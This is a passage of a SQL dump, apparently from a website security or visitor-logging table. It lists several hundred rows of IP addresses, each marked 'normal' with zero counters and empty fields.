0,0,0,0,0,'[]'),(4029,'213.175.66.138','normal','',0,0,0,0,0,'[]'),(4030,'66.249.74.93','normal','',0,0,0,0,0,'[]'),(4031,'78.142.50.85','normal','',0,0,0,0,0,'[]'),(4032,'115.246.184.108','normal','',0,0,0,0,0,'[]'),(4033,'131.25.85.133','normal','',0,0,0,0,0,'[]'),(4034,'178.128.111.192','normal','',0,0,0,0,0,'[]'),(4035,'66.249.74.66','normal','',0,0,0,0,0,'[]'),(4036,'114.119.142.39','normal','',0,0,0,0,0,'[]'),(4037,'217.151.98.163','normal','',0,0,0,0,0,'[]'),(4038,'107.174.248.116','normal','',0,0,0,0,0,'[]'),(4039,'66.42.84.224','normal','',0,0,0,0,0,'[]'),(4040,'104.196.25.239','normal','',0,0,0,0,0,'[]'),(4041,'81.214.131.2','normal','',0,0,0,0,0,'[]'),(4042,'65.108.64.210','normal','',0,0,0,0,0,'[]'),(4043,'34.78.198.205','normal','',0,0,0,0,0,'[]'),(4044,'223.240.101.111','normal','',0,0,0,0,0,'[]'),(4045,'23.226.28.20','normal','',0,0,0,0,0,'[]'),(4046,'34.72.199.255','normal','',0,0,0,0,0,'[]'),(4047,'35.202.135.180','normal','',0,0,0,0,0,'[]'),(4048,'114.119.143.50','normal','',0,0,0,0,0,'[]'),(4049,'54.38.33.178','normal','',0,0,0,0,0,'[]'),(4050,'45.61.187.99','normal','',0,0,0,0,0,'[]'),(4051,'35.238.160.93','normal','',0,0,0,0,0,'[]'),(4052,'35.210.53.213','normal','',0,0,0,0,0,'[]'),(4053,'174.129.172.13','normal','',0,0,0,0,0,'[]'),(4054,'3.95.156.215','normal','',0,0,0,0,0,'[]'),(4055,'3.95.156.215','normal','',0,0,0,0,0,'[]'),(4056,'3.95.156.215','normal','',0,0,0,0,0,'[]'),(4057,'3.95.156.215','normal','',0,0,0,0,0,'[]'),(4058,'52.90.50.182','normal','',0,0,0,0,0,'[]'),(4059,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4060,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4061,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4062,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4063,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4064,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4065,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4066,'3.81.168.107','normal','',0,0,0,0,0,'[]'),(4067,'69.174.52.230','normal','',0,0,0,0,0,'[]'),(4068,'34.138.217.50','normal','',0,0,0,0,0,'[]'),(4069,'41.216.183.216','normal','',0,0,0,0,0,'[]'),(4070,'213.152.186.168','normal','',0,0,0,0,0,'[]'),(4071,'206.189.112.203','normal','',0,0,0,0,0,'[]'),(4072,'193.37.254.3','normal','',0,0,0,0,0,'[]'),(4073,'41.216.183.217','normal','',0,0,0,0,0,'[]'),(4074,'220.230.168.15','normal','',0,0,0,0,0,'[]'),(4075,'220.230.168.9','normal','',0,0,0,0,0,'[]'),(4076,'162.142.125.211','normal','',0,0,0,0,0,'[]'),(4077,'162.142.125.211','normal','',0,0,0,0,0,'[]'),(4078,'167.248.133.119','normal','',0,0,0,0,0,'[]'),(4079,'193.169.253.168','normal','',0,0,0,0,0,'[]'),(4080,'35.224.56.164','normal','',0,0,0,0,0,'[]'),(4081,'35.190.138.51','normal','',0,0,0,0,0,'[]'),(4082,'65.21.124.253','normal','',0,0,0,0,0,'[]'),(4083,'220.230.168.10','normal','',0,0,0,0,0,'[]'),(4084,'206.72.206.62','normal','',0,0,0,0,0,'[]'),(4085,'41.216.183.152','normal','',0,0,0,0,0,'[]'),(4086,'91.245.255.98','normal','',0,0,0,0,0,'[]'),(4087,'220.230.168.17','normal','',0,0,0,0,0,'[]'),(4088,'220.230.168.6','normal','',0,0,0,0,0,'[]'),(4089,'3.234.141.18','normal','',0,0,0,0,0,'[]'),(4090,'20.108.2.17','normal','',0,0,0,0,0,'[]'),(4091,'34.94.76.74','normal','',0,0,0,0,0,'[]'),(4092,'34.74.248.226','normal','',0,0,0,0,0,'[]'),(4093,'191.101.31.45','normal','',0,0,0,0,0,'[]'),(4094,'199.249.230.47','normal','',0,0,0,0,0,'[]'),(4095,'134.19.179.235','normal','',0,0,0,0,0,'[]'),(4096,'34.75.236.188','normal','',0,0,0,0,0,'[]'),(4097,'185.156.174.155','normal','',0,0,0,0,0,'[]'),(4098,'14.116.158.108','normal','',0,0,0,0,0,'[]'),(4099,'206.189.33.114','normal','',0,0,0,0,0,'[]'),(4100,'162.241.225.117','normal','',0,0,0,0,0,'[]'),(4101,'162.241.252.230','normal','',0,0,0,0,0,'[]'),(4102,'78.46.75.254','normal','',0,0,0,0,0,'[]'),(4103,'185.23.117.170','normal','',0,0,0,0,0,'[]'),(4104,'54.36.148.58','normal','',0,0,0,0,0,'[]'),(4105,'20.68.143.222','normal','',0,0,0,0,0,'[]'),(4106,'114.119.135.158','normal','',0,0,0,0,0,'[]'),(4107,'8.29.128.217','normal','',0,0,0,0,0,'[]'),(4108,'193.235.141.177','normal','',0,0,0,0,0,'[]'),(4109,'220.230.168.2','normal','',0,0,0,0,0,'[]'),(4110,'220.230.168.11','normal','',0,0,0,0,0,'[]'),(4111,'46.235.40.122','normal','',0,0,0,0,0,'[]'),(4112,'34.222.46.234','normal','',0,0,0,0,0,'[]'),(4113,'35.92.15.132','normal','',0,0,0,0,0,'[]'),(4114,'54.202.148.116','normal','',0,0,0,0,0,'[]'),(4115,'35.90.65.149','normal','',0,0,0,0,0,'[]'),(4116,'195.179.237.9','normal','',0,0,0,0,0,'[]'),(4117,'89.46.105.239','normal','',0,0,0,0,0,'[]'),(4118,'156.67.73.144','normal','',0,0,0,0,0,'[]'),(4119,'31.220.106.105','normal','',0,0,0,0,0,'[]'),(4120,'192.64.117.208','normal','',0,0,0,0,0,'[]'),(4121,'198.244.143.200','normal','',0,0,0,0,0,'[]'),(4122,'74.208.59.254','normal','',0,0,0,0,0,'[]'),(4123,'82.165.81.9','normal','',0,0,0,0,0,'[]'),(4124,'78.142.63.31','normal','',0,0,0,0,0,'[]'),(4125,'31.184.215.230','normal','',0,0,0,0,0,'[]'),(4126,'50.73.33.135','normal','',0,0,0,0,0,'[]'),(4127,'62.171.183.101','normal','',0,0,0,0,0,'[]'),(4128,'103.27.60.66','normal','',0,0,0,0,0,'[]'),(4129,'34.139.188.110','normal','',0,0,0,0,0,'[]'),(4130,'128.127.105.184','normal','',0,0,0,0,0,'[]'),(4131,'161.97.90.217','normal','',0,0,0,0,0,'[]'),(4132,'82.165.87.63','normal','',0,0,0,0,0,'[]'),(4133,'103.247.11.240','normal','',0,0,0,0,0,'[]'),(4134,'49.12.114.46','normal','',0,0,0,0,0,'[]'),(4135,'35.202.169.54','normal','',0,0,0,0,0,'[]'),(4136,'119.28.78.249','normal','',0,0,0,0,0,'[]'),(4137,'45.64.187.254','normal','',0,0,0,0,0,'[]'),(4138,'93.186.242.173','normal','',0,0,0,0,0,'[]'),(4139,'2.59.119.2','normal','',0,0,0,0,0,'[]'),(4140,'66.228.32.9','normal','',0,0,0,0,0,'[]'),(4141,'67.225.161.250','normal','',0,0,0,0,0,'[]'),(4142,'185.50.56.4','normal','',0,0,0,0,0,'[]'),(4143,'70.34.133.151','normal','',0,0,0,0,0,'[]'),(4144,'175.178.241.165','normal','',0,0,0,0,0,'[]'),(4145,'23.226.89.72','normal','',0,0,0,0,0,'[]'),(4146,'164.92.169.121','normal','',0,0,0,0,0,'[]'),(4147,'72.52.186.8','normal','',0,0,0,0,0,'[]'),(4148,'148.72.232.160','normal','',0,0,0,0,0,'[]'),(4149,'220.230.168.5','normal','',0,0,0,0,0,'[]'),(4150,'220.230.168.28','normal','',0,0,0,0,0,'[]'),(4151,'208.77.159.5','normal','',0,0,0,0,0,'[]'),(4152,'91.134.248.245','normal','',0,0,0,0,0,'[]'),(4153,'194.63.235.189','normal','',0,0,0,0,0,'[]'),(4154,'34.145.125.175','normal','',0,0,0,0,0,'[]'),(4155,'67.205.176.79','normal','',0,0,0,0,0,'[]'),(4156,'51.79.146.95','normal','',0,0,0,0,0,'[]'),(4157,'134.209.222.89','normal','',0,0,0,0,0,'[]'),(4158,'183.90.250.15','normal','',0,0,0,0,0,'[]'),(4159,'62.3.41.108','normal','',0,0,0,0,0,'[]'),(4160,'51.79.207.190','normal','',0,0,0,0,0,'[]'),(4161,'121.78.79.85','normal','',0,0,0,0,0,'[]'),(4162,'167.114.64.93','normal','',0,0,0,0,0,'[]'),(4163,'220.230.168.24','normal','',0,0,0,0,0,'[]'),(4164,'23.235.194.70','normal','',0,0,0,0,0,'[]'),(4165,'51.13.81.56','normal','',0,0,0,0,0,'[]'),(4166,'185.107.112.128','normal','',0,0,0,0,0,'[]'),(4167,'67.227.237.232','normal','',0,0,0,0,0,'[]'),(4168,'95.211.186.231','normal','',0,0,0,0,0,'[]'),(4169,'208.88.73.86','normal','',0,0,0,0,0,'[]'),(4170,'90.156.169.18','normal','',0,0,0,0,0,'[]'),(4171,'52.26.178.66','normal','',0,0,0,0,0,'[]'),(4172,'196.43.185.101','normal','',0,0,0,0,0,'[]'),(4173,'77.243.228.84','normal','',0,0,0,0,0,'[]'),(4174,'35.243.200.189','normal','',0,0,0,0,0,'[]'),(4175,'51.255.144.79','normal','',0,0,0,0,0,'[]'),(4176,'116.202.128.32','normal','',0,0,0,0,0,'[]'),(4177,'194.163.163.7','normal','',0,0,0,0,0,'[]'),(4178,'167.172.143.92','normal','',0,0,0,0,0,'[]'),(4179,'34.77.246.194','normal','',0,0,0,0,0,'[]'),(4180,'141.94.203.127','normal','',0,0,0,0,0,'[]'),(4181,'85.128.143.151','normal','',0,0,0,0,0,'[]'),(4182,'198.12.125.130','normal','',0,0,0,0,0,'[]'),(4183,'139.59.127.114','normal','',0,0,0,0,0,'[]'),(4184,'143.244.184.204','normal','',0,0,0,0,0,'[]'),(4185,'185.112.145.178','normal','',0,0,0,0,0,'[]'),(4186,'82.165.85.103','normal','',0,0,0,0,0,'[]'),(4187,'220.230.168.30','normal','',0,0,0,0,0,'[]'),(4188,'177.153.20.43','normal','',0,0,0,0,0,'[]'),(4189,'5.196.203.67','normal','',0,0,0,0,0,'[]'),(4190,'128.199.122.92','normal','',0,0,0,0,0,'[]'),(4191,'114.115.136.65','normal','',0,0,0,0,0,'[]'),(4192,'41.83.103.170','normal','',0,0,0,0,0,'[]'),(4193,'82.165.86.28','normal','',0,0,0,0,0,'[]'),(4194,'82.165.81.72','normal','',0,0,0,0,0,'[]'),(4195,'185.51.188.22','normal','',0,0,0,0,0,'[]'),(4196,'34.139.33.26','normal','',0,0,0,0,0,'[]'),(4197,'120.25.147.55','normal','',0,0,0,0,0,'[]'),(4198,'165.22.69.253','normal','',0,0,0,0,0,'[]'),(4199,'42.193.106.55','normal','',0,0,0,0,0,'[]'),(4200,'107.189.13.99','normal','',0,0,0,0,0,'[]'),(4201,'194.233.77.4','normal','',0,0,0,0,0,'[]'),(4202,'198.46.81.43','normal','',0,0,0,0,0,'[]'),(4203,'135.181.119.15','normal','',0,0,0,0,0,'[]'),(4204,'193.70.114.151','normal','',0,0,0,0,0,'[]'),(4205,'35.184.215.233','normal','',0,0,0,0,0,'[]'),(4206,'34.68.16.246','normal','',0,0,0,0,0,'[]'),(4207,'46.31.79.2','normal','',0,0,0,0,0,'[]'),(4208,'94.73.146.148','normal','',0,0,0,0,0,'[]'),(4209,'103.154.185.122','normal','',0,0,0,0,0,'[]'),(4210,'123.56.247.161','normal','',0,0,0,0,0,'[]'),(4211,'114.119.149.46','normal','',0,0,0,0,0,'[]'),(4212,'51.159.77.133','normal','',0,0,0,0,0,'[]'),(4213,'85.128.143.200','normal','',0,0,0,0,0,'[]'),(4214,'139.59.64.121','normal','',0,0,0,0,0,'[]'),(4215,'103.96.110.35','normal','',0,0,0,0,0,'[]'),(4216,'167.71.94.207','normal','',0,0,0,0,0,'[]'),(4217,'167.71.94.207','normal','',0,0,0,0,0,'[]'),(4218,'134.19.179.131','normal','',0,0,0,0,0,'[]'),(4219,'185.107.112.81','normal','',0,0,0,0,0,'[]'),(4220,'185.107.112.221','normal','',0,0,0,0,0,'[]'),(4221,'207.244.239.136','normal','',0,0,0,0,0,'[]'),(4222,'47.103.94.184','normal','',0,0,0,0,0,'[]'),(4223,'198.38.88.243','normal','',0,0,0,0,0,'[]'),(4224,'176.31.65.104','normal','',0,0,0,0,0,'[]'),(4225,'168.138.27.184','normal','',0,0,0,0,0,'[]'),(4226,'5.249.150.250','normal','',0,0,0,0,0,'[]'),(4227,'67.227.144.244','normal','',0,0,0,0,0,'[]'),(4228,'39.97.78.175','normal','',0,0,0,0,0,'[]'),(4229,'159.253.46.194','normal','',0,0,0,0,0,'[]'),(4230,'199.249.230.2','normal','',0,0,0,0,0,'[]'),(4231,'111.229.251.165','normal','',0,0,0,0,0,'[]'),(4232,'18.162.51.22','normal','',0,0,0,0,0,'[]'),(4233,'31.11.36.228','normal','',0,0,0,0,0,'[]'),(4234,'216.158.228.157','normal','',0,0,0,0,0,'[]'),(4235,'148.66.128.80','normal','',0,0,0,0,0,'[]'),(4236,'34.66.113.129','normal','',0,0,0,0,0,'[]'),(4237,'67.225.140.8','normal','',0,0,0,0,0,'[]'),(4238,'34.237.52.22','normal','',0,0,0,0,0,'[]'),(4239,'142.132.134.40','normal','',0,0,0,0,0,'[]'),(4240,'120.27.18.147','normal','',0,0,0,0,0,'[]'),(4241,'67.225.140.132','normal','',0,0,0,0,0,'[]'),(4242,'82.165.86.64','normal','',0,0,0,0,0,'[]'),(4243,'51.75.130.25','normal','',0,0,0,0,0,'[]'),(4244,'104.255.174.93','normal','',0,0,0,0,0,'[]'),(4245,'103.155.93.241','normal','',0,0,0,0,0,'[]'),(4246,'194.59.164.178','normal','',0,0,0,0,0,'[]'),(4247,'167.99.119.158','normal','',0,0,0,0,0,'[]'),(4248,'5.101.156.60','normal','',0,0,0,0,0,'[]'),(4249,'154.53.42.220','normal','',0,0,0,0,0,'[]'),(4250,'173.201.186.254','normal','',0,0,0,0,0,'[]'),(4251,'103.54.251.167','normal','',0,0,0,0,0,'[]'),(4252,'132.148.106.163','normal','',0,0,0,0,0,'[]'),(4253,'217.148.136.176','normal','',0,0,0,0,0,'[]'),(4254,'35.202.60.49','normal','',0,0,0,0,0,'[]'),(4255,'92.205.1.224','normal','',0,0,0,0,0,'[]'),(4256,'150.95.112.219','normal','',0,0,0,0,0,'[]'),(4257,'185.129.168.41','normal','',0,0,0,0,0,'[]'),(4258,'92.204.55.20','normal','',0,0,0,0,0,'[]'),(4259,'104.152.110.183','normal','',0,0,0,0,0,'[]'),(4260,'136.144.251.177','normal','',0,0,0,0,0,'[]'),(4261,'210.245.90.215','normal','',0,0,0,0,0,'[]'),(4262,'156.67.211.101','normal','',0,0,0,0,0,'[]'),(4263,'192.227.155.193','normal','',0,0,0,0,0,'[]'),(4264,'45.130.229.130','normal','',0,0,0,0,0,'[]'),(4265,'66.249.66.139','normal','',0,0,0,0,0,'[]'),(4266,'66.249.66.3','normal','',0,0,0,0,0,'[]'),(4267,'205.185.120.53','normal','',0,0,0,0,0,'[]'),(4268,'182.61.51.214','normal','',0,0,0,0,0,'[]'),(4269,'185.216.119.106','normal','',0,0,0,0,0,'[]'),(4270,'132.232.6.17','normal','',0,0,0,0,0,'[]'),(4271,'91.151.70.28','normal','',0,0,0,0,0,'[]'),(4272,'181.214.218.47','normal','',0,0,0,0,0,'[]'),(4273,'82.165.85.145','normal','',0,0,0,0,0,'[]'),(4274,'206.72.195.89','normal','',0,0,0,0,0,'[]'),(4275,'178.128.63.148','normal','',0,0,0,0,0,'[]'),(4276,'87.236.20.147','normal','',0,0,0,0,0,'[]'),(4277,'173.252.83.14','normal','',0,0,0,0,0,'[]'),(4278,'173.252.83.118','normal','',0,0,0,0,0,'[]'),(4279,'66.249.66.11','normal','',0,0,0,0,0,'[]'),(4280,'193.148.16.211','normal','',0,0,0,0,0,'[]'),(4281,'114.119.129.22','normal','',0,0,0,0,0,'[]'),(4282,'208.67.104.39','normal','',0,0,0,0,0,'[]'),(4283,'220.230.168.7','normal','',0,0,0,0,0,'[]'),(4284,'34.73.141.242','normal','',0,0,0,0,0,'[]'),(4285,'220.230.168.29','normal','',0,0,0,0,0,'[]'),(4286,'220.230.168.26','normal','',0,0,0,0,0,'[]'),(4287,'220.230.168.16','normal','',0,0,0,0,0,'[]'),(4288,'95.142.46.164','normal','',0,0,0,0,0,'[]'),(4289,'220.230.168.1','normal','',0,0,0,0,0,'[]'),(4290,'45.87.186.76','normal','',0,0,0,0,0,'[]'),(4291,'185.196.220.26','normal','',0,0,0,0,0,'[]'),(4292,'220.230.168.12','normal','',0,0,0,0,0,'[]'),(4293,'171.22.30.253','normal','',0,0,0,0,0,'[]'),(4294,'114.119.132.88','normal','',0,0,0,0,0,'[]'),(4295,'178.238.229.54','normal','',0,0,0,0,0,'[]'),(4296,'34.139.143.137','normal','',0,0,0,0,0,'[]'),(4297,'98.30.172.223','normal','',0,0,0,0,0,'[]'),(4298,'98.30.172.223','normal','',0,0,0,0,0,'[]'),(4299,'20.196.152.157','normal','',0,0,0,0,0,'[]'),(4300,'35.237.36.121','normal','',0,0,0,0,0,'[]'),(4301,'146.59.243.31','normal','',0,0,0,0,0,'[]'),(4302,'104.244.77.229','normal','',0,0,0,0,0,'[]'),(4303,'34.139.220.67','normal','',0,0,0,0,0,'[]'),(4304,'213.152.161.211','normal','',0,0,0,0,0,'[]'),(4305,'198.98.50.19','normal','',0,0,0,0,0,'[]'),(4306,'221.2.155.200','normal','',0,0,0,0,0,'[]'),(4307,'20.160.132.201','normal','',0,0,0,0,0,'[]'),(4308,'179.5.22.198','normal','',0,0,0,0,0,'[]'),(4309,'54.36.148.184','normal','',0,0,0,0,0,'[]'),(4310,'178.172.138.41','normal','',0,0,0,0,0,'[]'),(4311,'185.122.170.50','normal','',0,0,0,0,0,'[]'),(4312,'144.168.225.107','normal','',0,0,0,0,0,'[]'),(4313,'65.108.128.54','normal','',0,0,0,0,0,'[]'),(4314,'114.119.156.30','normal','',0,0,0,0,0,'[]'),(4315,'3.16.82.15','normal','',0,0,0,0,0,'[]'),(4316,'180.76.26.180','normal','',0,0,0,0,0,'[]'),(4317,'135.181.128.56','normal','',0,0,0,0,0,'[]'),(4318,'35.159.38.155','normal','',0,0,0,0,0,'[]'),(4319,'40.77.189.129','normal','',0,0,0,0,0,'[]'),(4320,'54.187.122.218','normal','',0,0,0,0,0,'[]'),(4321,'35.92.210.142','normal','',0,0,0,0,0,'[]'),(4322,'139.162.36.174','normal','',0,0,0,0,0,'[]'),(4323,'17.121.112.110','normal','',0,0,0,0,0,'[]'),(4324,'114.119.151.165','normal','',0,0,0,0,0,'[]'),(4325,'54.36.148.89','normal','',0,0,0,0,0,'[]'),(4326,'54.36.149.17','normal','',0,0,0,0,0,'[]'),(4327,'54.36.148.145','normal','',0,0,0,0,0,'[]'),(4328,'54.36.149.13','normal','',0,0,0,0,0,'[]'),(4329,'54.36.149.102','normal','',0,0,0,0,0,'[]'),(4330,'54.36.148.32','normal','',0,0,0,0,0,'[]'),(4331,'54.36.149.24','normal','',0,0,0,0,0,'[]'),(4332,'54.36.148.94','normal','',0,0,0,0,0,'[]'),(4333,'54.36.149.82','normal','',0,0,0,0,0,'[]'),(4334,'54.36.149.81','normal','',0,0,0,0,0,'[]'),(4335,'18.197.96.179','normal','',0,0,0,0,0,'[]'),(4336,'52.141.49.136','normal','',0,0,0,0,0,'[]'),(4337,'130.255.166.122','normal','',0,0,0,0,0,'[]'),(4338,'130.255.166.79','normal','',0,0,0,0,0,'[]'),(4339,'130.255.166.26','normal','',0,0,0,0,0,'[]'),(4340,'130.255.166.51','normal','',0,0,0,0,0,'[]'),(4341,'130.255.166.69','normal','',0,0,0,0,0,'[]'),(4342,'209.141.45.47','normal','',0,0,0,0,0,'[]'),(4343,'159.65.239.34','normal','',0,0,0,0,0,'[]'),(4344,'162.241.62.247','normal','',0,0,0,0,0,'[]'),(4345,'162.144.21.93','normal','',0,0,0,0,0,'[]'),(4346,'162.241.226.109','normal','',0,0,0,0,0,'[]'),(4347,'34.148.252.114','normal','',0,0,0,0,0,'[]'),(4348,'181.215.176.24','normal','',0,0,0,0,0,'[]'),(4349,'134.19.179.179','normal','',0,0,0,0,0,'[]'),(4350,'20.90.72.126','normal','',0,0,0,0,0,'[]'),(4351,'44.210.99.110','normal','',0,0,0,0,0,'[]'),(4352,'87.250.224.69','normal','',0,0,0,0,0,'[]'),(4353,'34.73.64.233','normal','',0,0,0,0,0,'[]'),(4354,'71.29.209.159','normal','',0,0,0,0,0,'[]'),(4355,'71.29.209.159','normal','',0,0,0,0,0,'[]'),(4356,'137.74.24.99','normal','',0,0,0,0,0,'[]'),(4357,'195.191.219.132','normal','',0,0,0,0,0,'[]'),(4358,'17.121.114.240','normal','',0,0,0,0,0,'[]'),(4359,'17.121.114.250','normal','',0,0,0,0,0,'[]'),(4360,'200.147.58.16','normal','',0,0,0,0,0,'[]'),(4361,'85.128.143.162','normal','',0,0,0,0,0,'[]'),(4362,'54.185.198.23','normal','',0,0,0,0,0,'[]'),(4363,'45.173.240.6','normal','',0,0,0,0,0,'[]'),(4364,'47.242.86.172','normal','',0,0,0,0,0,'[]'),(4365,'34.139.70.49','normal','',0,0,0,0,0,'[]'),(4366,'34.79.7.22','normal','',0,0,0,0,0,'[]'),(4367,'213.152.161.234','normal','',0,0,0,0,0,'[]'),(4368,'45.154.12.98','normal','',0,0,0,0,0,'[]'),(4369,'46.19.137.116','normal','',0,0,0,0,0,'[]'),(4370,'46.101.168.131','normal','',0,0,0,0,0,'[]'),(4371,'54.236.1.11','normal','',0,0,0,0,0,'[]'),(4372,'3.21.105.230','normal','',0,0,0,0,0,'[]'),(4373,'3.21.105.230','normal','',0,0,0,0,0,'[]'),(4374,'3.21.105.230','normal','',0,0,0,0,0,'[]'),(4375,'3.21.105.230','normal','',0,0,0,0,0,'[]'),(4376,'220.230.168.3','normal','',0,0,0,0,0,'[]'),(4377,'103.163.139.202','normal','',0,0,0,0,0,'[]'),(4378,'114.119.146.252','normal','',0,0,0,0,0,'[]'),(4379,'77.73.134.16','normal','',0,0,0,0,0,'[]'),(4380,'14.137.153.221','normal','',0,0,0,0,0,'[]'),(4381,'34.75.11.216','normal','',0,0,0,0,0,'[]'),(4382,'34.74.74.150','normal','',0,0,0,0,0,'[]'),(4383,'35.237.186.253','normal','',0,0,0,0,0,'[]'),(4384,'54.36.148.226','normal','',0,0,0,0,0,'[]'),(4385,'20.19.122.234','normal','',0,0,0,0,0,'[]'),(4386,'77.111.247.72','normal','',0,0,0,0,0,'[]'),(4387,'66.249.66.31','normal','',0,0,0,0,0,'[]'),(4388,'66.249.66.141','normal','',0,0,0,0,0,'[]'),(4389,'186.239.192.34','normal','',0,0,0,0,0,'[]'),(4390,'34.139.139.80','normal','',0,0,0,0,0,'[]'),(4391,'34.132.158.149','normal','',0,0,0,0,0,'[]'),(4392,'43.251.133.57','normal','',0,0,0,0,0,'[]'),(4393,'34.148.193.47','normal','',0,0,0,0,0,'[]'),(4394,'174.7.32.199','normal','',0,0,0,0,0,'[]'),(4395,'207.102.138.83','normal','',0,0,0,0,0,'[]'),(4396,'3.88.136.180','normal','',0,0,0,0,0,'[]'),(4397,'3.222.251.141','normal','',0,0,0,0,0,'[]'),(4398,'34.82.166.13','normal','',0,0,0,0,0,'[]'),(4399,'114.119.139.35','normal','',0,0,0,0,0,'[]'),(4400,'35.175.124.5','normal','',0,0,0,0,0,'[]'),(4401,'35.229.113.211','normal','',0,0,0,0,0,'[]'),(4402,'3.88.168.46','normal','',0,0,0,0,0,'[]'),(4403,'13.69.21.1','normal','',0,0,0,0,0,'[]'),(4404,'13.69.21.1','normal','',0,0,0,0,0,'[]'),(4405,'13.69.21.1','normal','',0,0,0,0,0,'[]'),(4406,'113.35.251.98','normal','',0,0,0,0,0,'[]'),(4407,'165.232.174.131','normal','',0,0,0,0,0,'[]'),(4408,'34.78.102.4','normal','',0,0,0,0,0,'[]'),(4409,'75.101.248.148','normal','',0,0,0,0,0,'[]'),(4410,'197.242.145.205','normal','',0,0,0,0,0,'[]'),(4411,'51.195.166.195','normal','',0,0,0,0,0,'[]'),(4412,'65.108.227.178','normal','',0,0,0,0,0,'[]'),(4413,'3.85.177.191','normal','',0,0,0,0,0,'[]'),(4414,'34.75.194.113','normal','',0,0,0,0,0,'[]'),(4415,'154.6.86.21','normal','',0,0,0,0,0,'[]'),(4416,'52.226.227.211','normal','',0,0,0,0,0,'[]'),(4417,'44.204.253.6','normal','',0,0,0,0,0,'[]'),(4418,'18.229.212.101','normal','',0,0,0,0,0,'[]'),(4419,'34.204.78.35','normal','',0,0,0,0,0,'[]'),(4420,'37.139.53.40','normal','',0,0,0,0,0,'[]'),(4421,'91.219.254.100','normal','',0,0,0,0,0,'[]'),(4422,'52.55.72.7','normal','',0,0,0,0,0,'[]'),(4423,'51.91.18.43','normal','',0,0,0,0,0,'[]'),(4424,'47.243.75.131','normal','',0,0,0,0,0,'[]'),(4425,'54.36.149.42','normal','',0,0,0,0,0,'[]'),(4426,'65.109.24.4','normal','',0,0,0,0,0,'[]'),(4427,'192.185.4.121','normal','',0,0,0,0,0,'[]'),(4428,'186.234.80.28','normal','',0,0,0,0,0,'[]'),(4429,'47.254.69.184','normal','',0,0,0,0,0,'[]'),(4430,'181.215.176.68','normal','',0,0,0,0,0,'[]'),(4431,'34.148.231.23','normal','',0,0,0,0,0,'[]'),(4432,'220.181.51.88','normal','',0,0,0,0,0,'[]'),(4433,'116.179.33.207','normal','',0,0,0,0,0,'[]'),(4434,'13.233.37.202','normal','',0,0,0,0,0,'[]'),(4435,'34.84.42.54','normal','',0,0,0,0,0,'[]'),(4436,'34.143.243.10','normal','',0,0,0,0,0,'[]'),(4437,'20.25.115.173','normal','',0,0,0,0,0,'[]'),(4438,'114.119.148.169','normal','',0,0,0,0,0,'[]'),(4439,'95.85.17.8','normal','',0,0,0,0,0,'[]'),(4440,'143.110.176.116','normal','',0,0,0,0,0,'[]'),(4441,'110.42.210.9','normal','',0,0,0,0,0,'[]'),(4442,'185.191.171.45','normal','',0,0,0,0,0,'[]'),(4443,'47.242.37.182','normal','',0,0,0,0,0,'[]'),(4444,'220.230.168.4','normal','',0,0,0,0,0,'[]'),(4445,'220.230.168.8','normal','',0,0,0,0,0,'[]'),(4446,'162.241.216.173','normal','',0,0,0,0,0,'[]'),(4447,'220.230.168.23','normal','',0,0,0,0,0,'[]'),(4448,'50.87.224.231','normal','',0,0,0,0,0,'[]'),(4449,'212.30.36.73','normal','',0,0,0,0,0,'[]'),(4450,'68.69.184.202','normal','',0,0,0,0,0,'[]'),(4451,'35.185.88.142','normal','',0,0,0,0,0,'[]'),(4452,'209.221.240.194','normal','',0,0,0,0,0,'[]'),(4453,'10.11.4.210','normal','',0,0,0,0,0,'[]'),(4454,'37.120.142.157','normal','',0,0,0,0,0,'[]'),(4455,'66.249.66.5','normal','',0,0,0,0,0,'[]'),(4456,'35.227.21.36','normal','',0,0,0,0,0,'[]'),(4457,'20.168.58.69','normal','',0,0,0,0,0,'[]'),(4458,'159.65.4.107','normal','',0,0,0,0,0,'[]'),(4459,'103.191.51.28','normal','',0,0,0,0,0,'[]'),(4460,'104.198.39.203','normal','',0,0,0,0,0,'[]'),(4461,'45.41.12.172','normal','',0,0,0,0,0,'[]'),(4462,'168.91.87.47','normal','',0,0,0,0,0,'[]'),(4463,'196.16.74.186','normal','',0,0,0,0,0,'[]'),(4464,'196.19.249.167','normal','',0,0,0,0,0,'[]'),(4465,'14.29.223.121','normal','',0,0,0,0,0,'[]'),(4466,'14.116.185.229','normal','',0,0,0,0,0,'[]'),(4467,'185.191.171.38','normal','',0,0,0,0,0,'[]'),(4468,'20.19.208.117','normal','',0,0,0,0,0,'[]'),(4469,'13.233.178.41','normal','',0,0,0,0,0,'[]'),(4470,'194.233.82.147','normal','',0,0,0,0,0,'[]'),(4471,'54.36.148.18','normal','',0,0,0,0,0,'[]'),(4472,'62.108.37.226','normal','',0,0,0,0,0,'[]'),(4473,'181.214.218.40','normal','',0,0,0,0,0,'[]'),(4474,'163.116.136.254','normal','',0,0,0,0,0,'[]'),(4475,'34.148.60.207','normal','',0,0,0,0,0,'[]'),(4476,'141.95.104.232','normal','',0,0,0,0,0,'[]'),(4477,'54.202.29.136','normal','',0,0,0,0,0,'[]'),(4478,'35.86.102.13','normal','',0,0,0,0,0,'[]'),(4479,'34.139.212.74','normal','',0,0,0,0,0,'[]'),(4480,'20.70.18.235','normal','',0,0,0,0,0,'[]'),(4481,'159.89.38.20','normal','',0,0,0,0,0,'[]'),(4482,'159.89.38.20','normal','',0,0,0,0,0,'[]'),(4483,'159.89.38.20','normal','',0,0,0,0,0,'[]'),(4484,'168.138.26.148','normal','',0,0,0,0,0,'[]'),(4485,'51.79.197.180','normal','',0,0,0,0,0,'[]'),(4486,'108.167.189.26','normal','',0,0,0,0,0,'[]'),(4487,'180.76.26.198','normal','',0,0,0,0,0,'[]'),(4488,'114.119.149.159','normal','',0,0,0,0,0,'[]'),(4489,'162.241.224.140','normal','',0,0,0,0,0,'[]'),(4490,'37.221.115.34','normal','',0,0,0,0,0,'[]'),(4491,'40.118.66.15','normal','',0,0,0,0,0,'[]'),(4492,'35.231.58.67','normal','',0,0,0,0,0,'[]'),(4493,'34.250.119.114','normal','',0,0,0,0,0,'[]'),(4494,'34.250.119.114','normal','',0,0,0,0,0,'[]'),(4495,'35.231.4.126','normal','',0,0,0,0,0,'[]'),(4496,'147.78.47.37','normal','',0,0,0,0,0,'[]'),(4497,'191.101.